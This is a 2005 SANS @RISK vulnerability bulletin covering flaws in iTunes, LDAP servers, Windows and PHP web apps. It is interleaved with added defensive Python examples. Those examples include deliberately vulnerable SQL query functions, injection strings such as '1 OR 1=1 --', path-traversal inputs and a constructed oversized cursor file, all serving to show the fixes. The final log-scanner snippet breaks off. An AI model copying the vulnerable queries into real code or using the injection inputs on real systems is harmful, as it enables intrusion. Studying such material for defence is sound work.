
@RISK: The Consensus Security Vulnerability Alert

Volume: IV, Issue: 2
January 13, 2005

Your Defense In Depth and Roadmap to Network Security poster should have arrived (if you live in the US or Canada). If you didn't get one, you can still see which security tools actually work and what constitutes a complete defense in depth at http://www.sans.org/whatworks.

@RISK is the SANS community's consensus bulletin summarizing the most important vulnerabilities and exploits identified during the past week and providing guidance on appropriate actions to protect your systems (PART I). It also includes a comprehensive list of all new vulnerabilities discovered in the past week (PART II).

Summary of the vulnerabilities reported this week:

    Category                    # of Updates & Vulnerabilities
    ---------------------------------------------------------
    Windows                      3  (#1, #2, #5, #12)
    Third Party Windows Apps     6  (#6, #11)
    Unix                         6  (#7, #9)
    Novell                       2
    Cross Platform               3  (#3, #4)
    Web Application             13  (#8, #10)
    Network Device               2
    Hardware                     1
Table Of Contents
Part II -- Comprehensive List of Newly Discovered Vulnerabilities from Qualys (www.qualys.com)
Windows
Third Party Windows Apps
Unix
Novell
Cross Platform
Web Application
Network Device
Hardware

**************** Sponsored by SANS Orlando 2005 *************************

The largest security training conference in Orlando starts in just 30 days. Practical, timely, exciting training programs for every security professional. Fourteen immersion tracks for security practitioners, managers and auditors. Those seeking ISC2 CISSP certification will find the nation's top rated prep course at SANS Orlando, too. Plus seven one- and two-day short courses. And Orlando is comfortable in February! Details: http://www.sans.org/orlando05/ PS. The late registration deadline is Friday, January 14.

*************************************************************************

PART I Critical Vulnerabilities

Part I is compiled by the security team at TippingPoint (www.tippingpoint.com) as a by-product of that company's continuous effort to ensure that its intrusion prevention products effectively block exploits using known vulnerabilities. TippingPoint's analysis is complemented by input from a council of security managers from twelve large organizations who confidentially share with SANS the specific actions they have taken to protect their systems. A detailed description of the process may be found at http://www.sans.org/newsletters/cva/#process

Widely Deployed Software
  • (3) HIGH: Apple iTunes Playlist Handling Overflow
  • Affected:
    • iTunes versions prior to 4.7.1
  • Description: Apple's iTunes is a widely used media player on both Windows and Mac OS systems. The player contains a buffer overflow in its handling of playlist files, i.e. files with a ".m3u" or ".pls" extension. Specifically, an overlong URL (over 3045 bytes) in a malicious playlist file triggers the overflow. A malicious web page can exploit the flaw to execute arbitrary code on a client system. Note that if iTunes is the default handler for playlist files, no user interaction is required to trigger the flaw.

  • Status: Apple confirmed, upgrade to version 4.7.1.

  • Council Site Actions: We were unable to solicit the council site input for this item.

  • References:
  • (4) MODERATE: Multiple Vendor LDAP Directory Server Buffer Overflow
  • Affected:
    • Netscape Directory Server version 6.21 and prior
    • Hitachi Directory Server version 2 P-2444-A124 02-11-/H and prior
    • Possibly other Directory servers
  • Description: Multiple vendors' LDAP directory server implementations contain a buffer overflow. An unauthenticated attacker can exploit the flaw to possibly execute arbitrary code on a vulnerable directory server with the privileges of the LDAP service. No technical details of the LDAP query that triggers the overflow have been published yet.

  • Status: HP and Red Hat have confirmed the flaw and released updates. Confirmation from the other affected vendors is still awaited.

  • Council Site Actions: We were unable to solicit the council site input for this item.

  • References:
  • (5) MODERATE: Microsoft Indexing Service Buffer Overflow
  • Affected:
    • Windows XP/2003 running Indexing Service
  • Description: The Windows Indexing Service is a base service of Windows 2000 and later that extracts content from files and builds an indexed catalog for fast searching. The Indexing Service is reachable by anonymous users over HTTP only if the IIS server has been specifically configured to expose it (not the default configuration). Under such a configuration an anonymous user can trigger a buffer overflow in the Indexing Service with a crafted query. The flaw may be exploited to execute arbitrary code with SYSTEM privileges. Only limited technical details are publicly available. Note that the Indexing Service can also be reached over SMB; however, over SMB it is accessible only to authenticated users, which reduces the risk from that vector.

  • Status: Apply the patch contained in the Microsoft Security Bulletin MS05-003.

  • Council Site Actions: Most of the reporting council sites do not run indexing or if they do it is on a very limited basis. Those who are using indexing plan to install the patch during their next regularly scheduled update process.

  • References:
  • (6) MODERATE: Symantec Norton Antivirus Software DoS
  • Affected:
    • Symantec Norton Antivirus 2004 and prior
  • Description: Symantec Norton AntiVirus is a very widely used product for protecting Windows systems. The product reportedly contains a denial-of-service vulnerability in "ccErrDsp.dll". This DLL registers a COM object containing an overflow that can be triggered by an overlong parameter. A malicious website could exploit the flaw to kill the antivirus process on a client and then install malware by exploiting any unpatched IE vulnerability. A proof-of-concept exploit is included in the discoverer's posting.

  • Status: Symantec is validating the flaw and will release patches, if necessary.

  • Council Site Actions: Only a few council sites are using the affected software. They are waiting on confirmation and a patch from the vendor.

  • References:
Other Software
  • (7) HIGH: poppassd_pam Unauthorized Password Change
  • Affected:
    • poppassd_pam version 1.0 and prior
    • poppassd_ceti version 1.0 and prior
  • Description: The poppassd_pam server lets users change their system passwords, and thereby their POP passwords. The server contains a flaw that allows any user to change another user's password, including root's. The flaw can therefore be exploited to possibly obtain root access on the server running poppassd_pam. The problem arises because the server does not validate a user's current password before changing it.

  • Status: Vendor confirmed, fixes available.

  • Council Site Actions: We were unable to solicit the council site input for this item.

  • References:
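The check poppassd_pam omits, as an added example that is not code from poppassd_pam or poppassd_ceti: a minimal password-change session handler that only honours "newpass" after "pass" has been verified against the stored hash of the user named in "user". The command names and 200/500 reply codes follow the Eudora-style poppassd dialogue as assumed here, the account table is constructed in memory, and the hashing scheme (PBKDF2-SHA256) is this example's choice rather than anything the advisory describes.

```python
"""poppassd-style password change that verifies the current password first.

Added example, not from poppassd_pam. Commands arrive one per line
("user NAME", "pass OLD", "newpass NEW", "quit"); replies are "200 ..."
on success and "500 ..." on failure (assumed Eudora-style dialogue).
The state machine is the point: a change is gated on the *current*
password of *this* user having just been verified.
"""
import hashlib
import hmac
import secrets

ITERATIONS = 50_000  # PBKDF2 work factor; demo value

def hash_password(password, salt=None):
    """Return (salt, digest) using PBKDF2-HMAC-SHA256 with a random 16-byte salt."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, digest):
    """Constant-time comparison of the candidate against the stored digest."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)

def demo_accounts():
    """Constructed account table: username -> (salt, digest). Demo passwords only."""
    return {"alice": hash_password("correct horse battery"),
            "root": hash_password("r00t-demo-only")}

class PoppassdSession:
    """One client connection. `accounts` is shared and updated on a successful change."""

    def __init__(self, accounts):
        self.accounts = accounts
        self.user = None            # set by "user"
        self.authenticated = False  # set only when "pass" verifies for self.user

    def handle(self, line):
        parts = line.strip().split(" ", 1)
        cmd = parts[0].lower()
        arg = parts[1] if len(parts) > 1 else ""

        if cmd == "user":
            # Naming a (new) user always drops any earlier authentication.
            self.user, self.authenticated = arg, False
            return "200 your password please."

        if cmd == "pass":
            if self.user is None:
                return "500 Username required."
            record = self.accounts.get(self.user)
            # Hash even for unknown users so timing does not reveal valid names.
            salt, digest = record if record else (bytes(16), bytes(32))
            if record is None or not verify_password(arg, salt, digest):
                self.authenticated = False
                return "500 Old password is incorrect."
            self.authenticated = True
            return "200 your new password please."

        if cmd == "newpass":
            # The missing check in poppassd_pam: without this line anyone who
            # can say "user root" can set root's password.
            if not self.authenticated:
                return "500 Old password must be verified first."
            if len(arg) < 8:
                return "500 New password too short."
            self.accounts[self.user] = hash_password(arg)
            self.authenticated = False  # one change per authentication
            return "200 Password changed, thank-you."

        if cmd == "quit":
            return "200 Bye."
        return "500 Unknown command."
```

A session that says "user root" followed directly by "newpass ..." gets a 500 and root's hash is untouched; switching users after a successful "pass" also drops the authenticated state, so a user cannot authenticate as themselves and then redirect the change at another account.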
  • (8) HIGH: SugarCRM and VHCS Remote File Include Vulnerabilities
  • Affected:
    • Sugar CRM, possibly all versions
    • Virtual Hosting Control System (VHCS) version 2.2 and prior
  • Description: The following software packages reportedly contain PHP remote file include vulnerabilities: SugarCRM and VHCS. A remote attacker can exploit these flaws to run arbitrary PHP code on the web server hosting the vulnerable package. The postings show how to craft the malicious HTTP requests that exploit the flaws. Note that the vulnerabilities can be exploited only if the server's "register_globals" PHP configuration parameter is set to "On"; the default for this parameter is "Off" in PHP 4.2.0 and later.

  • Status: SugarCRM: fix information is included in the discoverer's posting. VHCS: unknown. A workaround is to set "register_globals" to "Off".

  • Council Site Actions: The affected software is not in production or widespread use, or is not officially supported at any of the council sites. They reported that no action was necessary.

  • References:
Exploit Code
Part II: Weekly Comprehensive List of Newly Discovered Vulnerabilities
Week 2, 2005

This list is compiled by Qualys ( www.qualys.com ) as part of that company's ongoing effort to ensure its vulnerability management web service tests for all known vulnerabilities that can be scanned. As of this week Qualys scans for 4008 unique vulnerabilities. For this special SANS community listing, Qualys also includes vulnerabilities that cannot be scanned remotely.


  • 05.2.1 - CVE: CAN-2004-1043
  • Platform: Windows
  • Title: Windows HTML Help Code Execution
  • Description: A cross-domain vulnerability in the Windows HTML Help ActiveX control could allow information disclosure or remote code execution. An attacker could exploit it by constructing a malicious web page; an unsuspecting user who visits that page could have arbitrary code run on their system. All Windows systems are affected.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS05-001.mspx

  • 05.2.2 - CVE: CAN-2004-1049
  • Platform: Windows
  • Title: Windows User32.DLL Buffer Overflow
  • Description: The Windows animated cursor (ANI) file handler in user32.dll is affected by a stack-based buffer overflow. The issue exists because the attacker-supplied length field of an ANI file header is used directly in a "memcpy()" operation without a bounds check. All versions of Microsoft Windows are vulnerable to this issue.
  • Ref: http://www.microsoft.com/technet/security/bulletin/MS05-002.mspx
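The bounds check the advisory says was missing, as an added example that is not Microsoft's code or taken from the bulletin: a small RIFF walker for .ani files that refuses any "anih" chunk whose declared length is not the 36 bytes of the fixed animated-cursor header, and refuses any chunk that claims more bytes than the file contains. The 36-byte header size and nine-DWORD layout are from the ANI file format as assumed here; the field names are descriptive, not Microsoft's identifiers; the sample files are constructed in code.

```python
"""Validate the 'anih' chunk length of a RIFF/ACON (.ani) file.

Added example, not code from user32.dll or the MS05-002 bulletin. The
animated-cursor header is a fixed 36-byte structure; a parser that trusts
the chunk's own length field and memcpy()s that many bytes into a
36-byte buffer is the overflow described above. Here the length is checked
before anything is copied.
"""
import struct

ANIH_SIZE = 36  # nine little-endian DWORDs (assumed ANIHEADER layout)

class AniError(ValueError):
    """Any structural problem; callers treat the file as hostile."""

def riff_chunks(data):
    """Yield (fourcc, payload) for each top-level chunk of a RIFF/ACON container.

    Every declared length is checked against the bytes that actually remain,
    so no chunk can claim more data than the file holds.
    """
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        raise AniError("not a RIFF/ACON file")
    riff_len = struct.unpack_from("<I", data, 4)[0]
    end = 8 + riff_len
    if end > len(data):
        raise AniError("RIFF length %d exceeds file size %d" % (riff_len, len(data)))
    pos = 12
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        body = pos + 8
        if size > end - body:
            raise AniError("chunk %r declares %d bytes, only %d remain" % (fourcc, size, end - body))
        yield fourcc, data[body:body + size]
        pos = body + size + (size & 1)  # RIFF chunks are padded to even length

def parse_anih(data):
    """Return the header fields as a dict, or raise AniError.

    This is the check the advisory describes as missing: the anih payload
    must be exactly ANIH_SIZE bytes before it is unpacked into the fixed
    structure.
    """
    for fourcc, payload in riff_chunks(data):
        if fourcc != b"anih":
            continue
        if len(payload) != ANIH_SIZE:
            raise AniError("anih chunk is %d bytes, expected %d" % (len(payload), ANIH_SIZE))
        names = ("size", "frames", "steps", "width", "height",
                 "bit_count", "planes", "display_rate", "flags")
        return dict(zip(names, struct.unpack("<9I", payload)))
    raise AniError("no anih chunk")

def is_safe_ani(data):
    """True only if the file parses and its anih chunk has the expected size."""
    try:
        parse_anih(data)
        return True
    except AniError:
        return False

def build_ani(anih_payload):
    """Construct a minimal .ani around the given anih payload (test data, not a real cursor)."""
    chunk = b"anih" + struct.pack("<I", len(anih_payload)) + anih_payload
    if len(anih_payload) & 1:
        chunk += b"\x00"
    body = b"ACON" + chunk
    return b"RIFF" + struct.pack("<I", len(body)) + body

def sample_good_ani():
    """Well-formed header: size 36, 1 frame, 1 step, 32x32, 32 bpp, 1 plane, rate 10, flags 1."""
    return build_ani(struct.pack("<9I", ANIH_SIZE, 1, 1, 32, 32, 32, 1, 10, 1))

def sample_oversized_ani():
    """The MS05-002 shape: an anih chunk that declares, and carries, far more than 36 bytes."""
    return build_ani(b"A" * 1000)
```

The same walker is what a mail gateway or IDS needs to flag hostile cursor files: the oversized sample and a truncated copy of it are both rejected, while the well-formed sample parses.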

  • 05.2.3 - CVE: CAN-2004-0897
  • Platform: Windows
  • Title: Windows Indexing Service Buffer Overflow
  • Description: Microsoft Indexing Service is used to manage, query, and index information in file systems or web servers. Microsoft Indexing Service is affected by a buffer overflow vulnerability. Microsoft has released a security bulletin addressing this issue.
  • Ref: http://www.microsoft.com/technet/security/Bulletin/MS05-003.mspx

  • 05.2.4 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Amp II 3D Game Engine Remote Denial of Service
  • Description: The Amp II 3D game engine is reported to be vulnerable to a remote denial of service condition since it fails to handle certain malformed network requests. Remote attackers could leverage this to deny service to legitimate clients of the game server. Amp Gore Ultimate Soldier version 1.50 is reported to be vulnerable.
  • Ref: http://aluigi.altervista.org/adv/amp2zero-adv.txt

  • 05.2.5 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Jeuce Web Server Directory Traversal and Denial of Service
  • Description: Jeuce Web Server is affected by directory traversal and denial of service issues caused by insufficient sanitization of "../" directory traversal and "://" sequences. Jeuce Web Server version 2.13 is affected.
  • Ref: http://www.securityfocus.com/bid/12183/info/

  • 05.2.6 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: WinHKI Multiple Remote Vulnerabilities
  • Description: WinHKI is a file compression tool for Microsoft Windows. WinHKI fails to correctly handle the file length field in an archive, which can be used to consume all CPU resources. It also allows archive contents to be decompressed into arbitrary locations, overwriting existing files. WinHKI version 1.4d is known to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12176/info/

  • 05.2.7 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: Winace Remote Directory Traversal
  • Description: Winace is a file compression/decompression tool. Winace is affected by a vulnerability that may allow an attacker to place files and overwrite files in arbitrary locations on a vulnerable computer. Winace versions 2.5 and 2.6 Beta 4 are reported to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12177/info/

  • 05.2.8 - CVE: Not Available
  • Platform: Third Party Windows Apps
  • Title: 3CDaemon Multiple Remote Vulnerabilities
  • Description: 3Com 3CDaemon is a TFTP, FTP, and Syslog daemon from 3Com. It is reportedly vulnerable to multiple security issues. These include format string, buffer overflow, information disclosure and denial of service conditions due to specially-crafted network requests. 3CDaemon 2.0 revision 10 is reported to be vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/385969

  • 05.2.9 - CVE: CAN-2004-1312
  • Platform: Third Party Windows Apps
  • Title: GFI MailEssentials and MailSecurity Remote Denial of Service
  • Description: GFI MailEssentials and MailSecurity are vulnerable to a remote denial of service condition, exposed while handling certain HTML email messages containing malformed JavaScript. This can be leveraged to deny service to legitimate users. GFI MailSecurity versions 8.x and MailEssentials versions 9.x and 10.x are reported to be vulnerable.
  • Ref: http://www.csis.dk/default.asp?m=1&a=194

  • 05.2.10 - CVE: CAN-2004-1143, CAN-2004-1177
  • Platform: Unix
  • Title: Mailman Multiple Vulnerabilities
  • Description: GNU Mailman is an email discussion lists manager. Mailman is vulnerable to a cross-site scripting issue due to insufficient sanitization of user-supplied data. Mailman is also affected by a password generation weakness. Mailman versions 2.x are known to be vulnerable.
  • Ref: http://secunia.com/advisories/13603/

  • 05.2.11 - CVE: Not Available
  • Platform: Unix
  • Title: Squid Proxy Malformed NTLM Message Remote Denial of Service
  • Description: Squid is a web proxy. Squid is vulnerable to a denial of service due to the way it handles a specially crafted NTLM type 3 message, which can also crash the NTLM helper application. Squid version 2.5 is known to be vulnerable.
  • Ref: http://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-fakeauth_auth

  • 05.2.12 - CVE: Not Available
  • Platform: Unix
  • Title: CUPS HTTP GET Denial Of Service
  • Description: CUPS, Common UNIX Printing System, is a set of printing utilities for UNIX-based systems. CUPS is affected by a denial of service vulnerability. CUPS versions 1.1.22 and earlier are known to be affected.
  • Ref: http://www.cups.org/str.php?L1042+P0+S-1+C0+I0+E0+Q1042

  • 05.2.13 - CVE: CAN-2005-0012
  • Platform: Unix
  • Title: Dillo Interface Message Format String Vulnerability
  • Description: The Dillo web browser contains a format string vulnerability that is exposed when it handles certain malicious web pages. Such pages could leverage this issue to execute arbitrary code in the context of the browser of an unsuspecting user. All current versions are vulnerable.
  • Ref: http://www.securityfocus.com/advisories/7788


  • 05.2.15 - CVE: Not Available
  • Platform: Unix
  • Title: LPRng Local Insecure Temporary File Creation Vulnerability
  • Description: The LPRng software is an extended and portable implementation of the Berkeley LPR print spooler. It is vulnerable to a temporary file creation issue in the "lprng_certs.sh" script. An attacker may leverage this issue to corrupt arbitrary files with the privileges of an unsuspecting user that activates the affected application. LPRng version 3.8.28 is vulnerable to this issue.
  • Ref: http://www.securityfocus.com/bid/12088/info/

  • 05.2.16 - CVE: Not Available
  • Platform: Novell
  • Title: Novell Netware CIFS.NLM Remote Denial of Service
  • Description: CIFS.NLM is Novell's implementation of the CIFS (SMB) file-sharing protocol for NetWare. It is affected by a remote denial of service when a port scan is run against the server. NetWare versions 5.1 and 6.0 are affected.
  • Ref: http://support.novell.com/cgi-bin/search/searchtid.cgi?/2970488.htm

  • 05.2.17 - CVE: Not Available
  • Platform: Novell
  • Title: Novell GroupWise WebAccess Information Disclosure
  • Description: GroupWise is the groupware package distributed and maintained by Novell. Its WebAccess component is vulnerable to a potential information disclosure vulnerability which may allow remote attackers to gather sensitive data that may be used to mount further attacks against a vulnerable computer. All versions of GroupWise are considered to be vulnerable.
  • Ref: http://www.securityfocus.com/bid/12194

  • 05.2.18 - CVE: CAN-2005-0043
  • Platform: Cross Platform
  • Title: Apple iTunes Playlist Buffer Overflow
  • Description: Apple iTunes is vulnerable to a buffer overflow condition while parsing specially crafted playlist files. If remote attackers can trick users into opening such files, this could be leveraged to execute arbitrary malicious code on the vulnerable system. iTunes versions earlier than 4.7.1 are reported to be vulnerable.
  • Ref: http://secunia.com/advisories/13804/

  • 05.2.19 - CVE: CAN-2004-0991
  • Platform: Cross Platform
  • Title: mpg123 Layer 2 Frame Header Heap Overflow
  • Description: mpg123 is a media player. It is reported to be vulnerable to a heap overflow issue due to improper sanitization of MP2 and MP3 file headers. mpg123 versions earlier than 0.59s-r9 are reported to be vulnerable.
  • Ref: http://secunia.com/advisories/13779/

  • 05.2.20 - CVE: CAN-2004-1183
  • Platform: Cross Platform
  • Title: LibTIFF Heap Corruption Integer Overflow Vulnerability
  • Description: LibTIFF is a library for manipulating Tag Image File Format (TIFF) files. It is vulnerable to a heap corruption issue that gets triggered when malicious or malformed image files are processed, and may be exploited by an attacker to execute arbitrary code in the user's system. LibTiff versions 3.7.1 and earlier are vulnerable.
  • Ref: http://www.securityfocus.com/advisories/7757

  • 05.2.21 - CVE: Not Available
  • Platform: Web Application
  • Title: VideoDB Unauthorized Access Vulnerability
  • Description: VideoDB is a database front-end application written in PHP to manage a personal video collection. It is vulnerable to an unauthorized access issue because the application fails to properly verify user permissions in the "edit.php" file. This may be exploited by a malicious user to edit or delete arbitrary movie database entries. VideoDB version 2.0.0 is vulnerable.
  • Ref: http://sourceforge.net/project/shownotes.php?release_id=295443

  • 05.2.22 - CVE: Not Available
  • Platform: Web Application
  • Title: PHPWind Board Remote File Include
  • Description: PHPWind Board is a web-based bulletin board application. PHPWind Board is affected by a remote file include vulnerability. PHPWind Board versions 1.3.6 and earlier are known to be affected.
  • Ref: http://www.securiteam.com/unixfocus/5FP012KEKS.html

  • 05.2.23 - CVE: Not Available
  • Platform: Web Application
  • Title: Zeroboard DIR Parameter Remote File Include
  • Description: Zeroboard is a web-based bulletin board application. Zeroboard is vulnerable to a remote file include issue due to insufficient sanitization of the "dir" parameter in the "error.php" script. All versions of Zeroboard are vulnerable.
  • Ref: http://www.optik4lab.com/modules/news/article.php?storyid=13

  • 05.2.24 - CVE: Not Available
  • Platform: Web Application
  • Title: Invision Community Blog SQL Injection
  • Description: Invision Community Blog is a web-based application. It is reported to be vulnerable to a SQL injection issue due to improper sanitization of the "eid" parameter in the "index.php" script. All versions of Invision Community Blog are reported to be vulnerable.
  • Ref: http://archives.neohapsis.com/archives/bugtraq/2005-01/0078.html

  • 05.2.25 - CVE: Not Available
  • Platform: Web Application
  • Title: Simple PHP Blog Remote Directory Traversal Vulnerabilities
  • Description: Simple PHP Blog is a web application implemented in PHP. It is reported to be vulnerable to two remote directory traversal issues due to improper sanitization of the "entry" parameter of the "comments.php" and the "comment_add_cgi.php" scripts. PHP Blog version 0.3.7c is reported to be vulnerable.
  • Ref: http://archives.neohapsis.com/archives/bugtraq/2005-01/0066.html
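One containment check serves the two traversal shapes in this list, as an added example that is not code from any of the products named: a web script that builds a filename from a request parameter (Simple PHP Blog's "entry", the "../" handling in Jeuce Web Server) and an archive extractor that trusts member names (WinAce, WinHKI). The archive format used is ZIP, purely because Python's standard library can build one in memory; the traversal pattern is the same. All file names and archive contents are constructed for the demonstration.

```python
"""Reject path traversal before touching the filesystem.

Added example, not taken from Simple PHP Blog, Jeuce, WinAce or WinHKI.
`contained_path` resolves the untrusted name under a base directory and
requires the result to still be inside it; `safe_extract` applies that
check to every archive member before writing anything.
"""
import io
import os
import posixpath
import tempfile
import zipfile

def contained_path(base_dir, untrusted):
    """Absolute path for `untrusted` under `base_dir`, or ValueError.

    Filtering the literal string "../" is bypassable ("..\\", encoded
    variants, absolute paths); resolving and comparing prefixes is not.
    """
    base = os.path.realpath(base_dir)
    rel = untrusted.replace("\\", "/")          # treat Windows separators as separators too
    if posixpath.isabs(rel):
        raise ValueError("absolute path not allowed: %r" % untrusted)
    target = os.path.realpath(os.path.join(base, *rel.split("/")))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes base directory: %r" % untrusted)
    return target

def safe_extract(zip_bytes, dest_dir):
    """Extract an in-memory ZIP under dest_dir; returns the paths written.

    Every member name is validated before the first write, so a hostile
    member cannot leave a half-extracted tree behind.
    """
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        members = [i for i in zf.infolist() if not i.is_dir()]
        targets = [(i, contained_path(dest_dir, i.filename)) for i in members]
        written = []
        for info, target in targets:
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with zf.open(info) as src, open(target, "wb") as dst:
                dst.write(src.read())
            written.append(target)
    return written

def build_zip(members):
    """Construct a ZIP from {name: bytes}; names are stored verbatim, '../' included."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, payload in members.items():
            zf.writestr(name, payload)
    return buf.getvalue()

def demo():
    """Run the check against a benign archive, a traversal archive and web-style parameters."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        dest = os.path.join(root, "extract")
        os.mkdir(dest)
        real_dest = os.path.realpath(dest)
        benign = build_zip({"docs/readme.txt": b"hello"})
        results["benign_written"] = [os.path.relpath(p, real_dest) for p in safe_extract(benign, dest)]
        evil = build_zip({"docs/readme.txt": b"hello", "../outside.txt": b"owned"})
        try:
            safe_extract(evil, dest)
            results["evil_rejected"] = False
        except ValueError:
            results["evil_rejected"] = True
        results["outside_exists"] = os.path.exists(os.path.join(root, "outside.txt"))
        # The same function guarding a blog's "entry" parameter:
        expected = os.path.join(real_dest, "2005", "01", "entry.txt")
        results["web_ok"] = contained_path(dest, "2005/01/entry.txt") == expected
        for attempt in ("../../etc/passwd", "..\\..\\boot.ini", "/etc/passwd", "docs/../../x"):
            try:
                contained_path(dest, attempt)
                results[attempt] = "allowed"
            except ValueError:
                results[attempt] = "rejected"
    return results
```

The check is done on the resolved path rather than on the string, so "docs/../../x", which contains no leading "../", is still rejected.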

  • 05.2.26 - CVE: Not Available
  • Platform: Web Application
  • Title: WoltLab Burning Board Lite Form Mail Script Cross-Site Scripting
  • Description: WoltLab Burning Board Lite is a Web-based bulletin board system. It is reported to be vulnerable to a cross-site scripting issue, due to improper sanitization of the "userid" parameter in the "formmail.php" script. WoltLab Burning Board Lite versions 1.0.0 and 1.0.1e are vulnerable.
  • Ref: http://www.securityfocus.com/archive/1/386590

  • 05.2.27 - CVE: Not Available
  • Platform: Web Application
  • Title: SugarCRM Remote File Include
  • Description: SugarCRM is a customer relationship management suite. Insufficient sanitization of the "moduleDefaultFile" variable in the "index.php" script exposes a remote file include issue. SugarSales versions 1.0g through 2.0.1c are affected.
  • Ref: http://www.securityfocus.com/bid/12183/info/

  • 05.2.28 - CVE: Not Available
  • Platform: Web Application
  • Title: Greymatter Password Disclosure Vulnerability
  • Description: Greymatter is a web-based log and journal maintenance system. It is vulnerable to a password disclosure issue because it creates a temporary file that includes the username and plaintext password. An attacker can exploit this issue to retrieve the temporary file with a GET request. Only Greymatter version 1.3 is vulnerable to this issue.
  • Ref: http://www.kernelpanik.org/docs/kernelpanik/greym13.en.txt

  • 05.2.29 - CVE: Not Available
  • Platform: Web Application
  • Title: Amphora Gate Unauthorized Access Vulnerability
  • Description: Amphora Gate is a device that manages Internet access for hotels, cyber cafes, etc. It is reported to be vulnerable to an unauthorized access issue, which arises because the "free_loginpage.php" and "validaction.php" scripts disclose sensitive information.
  • Ref: http://www.securityfocus.com/bid/12187/info/

  • 05.2.30 - CVE: Not Available
  • Platform: Web Application
  • Title: Greymatter Multiple HTML Injection Vulnerabilities
  • Description: Noah Grey Greymatter is a web-based log and journal maintenance system. It is reported to be vulnerable to HTML injection issues in the "gm-comments.cgi" and the "gm-cplog.cgi" scripts due to the application failing to sanitize user-supplied input. Noah Grey Greymatter version 1.3 is vulnerable.
  • Ref: http://www.kernelpanik.org/docs/kernelpanik/greym13.en.txt

  • 05.2.31 - CVE: Not Available
  • Platform: Web Application
  • Title: b2evolution SQL Injection Vulnerability
  • Description: b2evolution is a weblog and newsfeed application manager. It is vulnerable to an SQL injection due to insufficient sanitization of the "title" parameter of the "index.php" script. All versions of b2evolution are known to be vulnerable.
  • Ref: http://forums.b2evolution.net/viewtopic.php?p=12962
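The "eid" and "title" injection pattern from 05.2.24 and 05.2.31, as an added example that is not code from Invision Community Blog or b2evolution: two lookups run over a constructed SQLite table, one building the statement by string formatting (the flaw the advisories describe) and one binding the value as a parameter. The table, rows and column names are invented for the demonstration.

```python
"""SQL injection via an integer id and a LIKE search, and the parameterized fixes.

Added example, not from either product. A draft row is included so the
injected input visibly defeats the "draft = 0" filter in the vulnerable
queries and matches nothing in the safe ones.
"""
import sqlite3

def make_db():
    """Constructed in-memory table: two published entries and one draft."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE entries (eid INTEGER PRIMARY KEY, title TEXT, body TEXT, draft INTEGER)")
    conn.executemany("INSERT INTO entries VALUES (?, ?, ?, ?)", [
        (1, "Public post", "hello world", 0),
        (2, "Draft: Q1 numbers", "not for release", 1),
        (3, "Another public post", "more text", 0),
    ])
    return conn

def fetch_entry_vulnerable(conn, eid):
    # eid comes straight from the query string; the input rewrites the WHERE clause.
    sql = "SELECT eid, title FROM entries WHERE eid = %s AND draft = 0" % eid
    return conn.execute(sql).fetchall()

def fetch_entry_safe(conn, eid):
    # Coerce to the expected type, then bind; the value can never become SQL.
    try:
        eid_int = int(eid)
    except ValueError:
        return []
    return conn.execute(
        "SELECT eid, title FROM entries WHERE eid = ? AND draft = 0", (eid_int,)
    ).fetchall()

def search_title_vulnerable(conn, title):
    # A quote in the input closes the string literal and the rest is executed.
    sql = "SELECT eid, title FROM entries WHERE title LIKE '%%%s%%' AND draft = 0" % title
    return conn.execute(sql).fetchall()

def search_title_safe(conn, title):
    # Bind the pattern, and escape LIKE wildcards so input cannot widen the match either.
    escaped = title.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    return conn.execute(
        "SELECT eid, title FROM entries WHERE title LIKE ? ESCAPE '\\' AND draft = 0",
        ("%" + escaped + "%",),
    ).fetchall()
```

With the input "1 OR 1=1 --" the vulnerable id lookup returns every row, draft included, because the trailing comment discards the rest of the WHERE clause; the safe version rejects it at the int() conversion. The same holds for "' OR 1=1 --" against the title search.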

  • 05.2.32 - CVE: Not Available
  • Platform: Web Application
  • Title: Virtual Hosting Control System Remote File Include
  • Description: Virtual Hosting Control System is a web-based control panel for Web server management. Its "sql.php" script is vulnerable to a remote PHP file include issue that allows attackers to execute arbitrary scripts on the web server. Virtual Hosting Control System version 2.2 is reported to be vulnerable.
  • Ref: http://www.kernelpanik.org/docs/kernelpanik/vhcs22.en.txt
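What exploitation of the include() flaws in Part I item (8) and entries 05.2.22, 05.2.23, 05.2.27 and 05.2.32 looks like from the server side, as an added example that is not code from SugarCRM, VHCS, Zeroboard or PHPWind: an ordinary GET whose parameter value is a URL the attacker controls, which register_globals turns into the variable the script includes. The scanner below parses Combined Log Format lines and flags any parameter whose decoded value starts with a remote scheme, plus the "%00" truncation trick. The parameter names "moduleDefaultFile" and "dir" are the ones the advisories above name; the client addresses, hosts, paths and log lines are constructed.

```python
"""Spot PHP remote-file-include attempts in web server access logs.

Added example, not from any of the advisories. Anything whose decoded
value names a remote scheme is reported; hits on the parameters the
advisories name are "high", everything else is "review" (an open
redirect looks identical in a log and needs human triage).
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Combined Log Format: ip ident user [timestamp] "METHOD target PROTO" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# http/ftp are what include() fetches with allow_url_fopen on; the stream
# wrappers were abused the same way later and are cheap to match here.
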